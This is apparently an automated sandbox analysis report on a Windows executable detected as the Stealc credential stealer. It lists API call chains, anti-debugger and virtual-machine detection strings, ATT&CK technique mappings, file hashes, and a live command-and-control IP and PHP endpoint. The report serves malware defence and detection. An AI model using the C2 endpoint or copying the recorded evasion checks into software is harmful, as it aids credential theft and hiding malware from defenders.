              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,3_2_006B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_006BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,3_2_006C1BF0
              Source: file.exe, file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware"
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.0000000001394000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.0000000001366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26129
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-25975
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-25994
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26122
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26142
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A4A60 VirtualProtect 00000000,00000004,00000100,?3_2_006A4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_006C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C6390 mov eax, dword ptr fs:[00000030h]3_2_006C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_006C2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,3_2_006C4610
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_006C46A0
              Source: file.exe, file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: _tProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_006C2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,3_2_006C2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_006C2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_006C2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/&~100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpKfile.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php9file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/&~file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php#file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.php2file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpwfile.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561922
                              Start date and time:2024-11-24 20:00:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 124
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.945005616294114
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'812'992 bytes
                              MD5:969e7116d6269d76ae0df0b8126872e9
                              SHA1:30b1390b554c8d1e0b0a9af308488276cd13beb9
                              SHA256:d2a488577867cfd25a06cca8c590e7054429f50bfeecb35d641aac911a8ccdb0
                              SHA512:f3a7bff25ab08d2f550d5ba82640377f53ec33695d20aef87fb57331276678e6e3856055cc992e1046f904197db103059788a7ebe21db7f7c806aa9c71f1985f
                              SSDEEP:49152:e2+P+xlmyEAXXoCc/tQJ4IAp/xWoBOsYVqee:n+PSQdp/yiNxW1NVqee
                              TLSH:2D8533381B71DB98E9C026B35759A2FDBF7C81DC70AF76804901E66E8EAFAF12514305
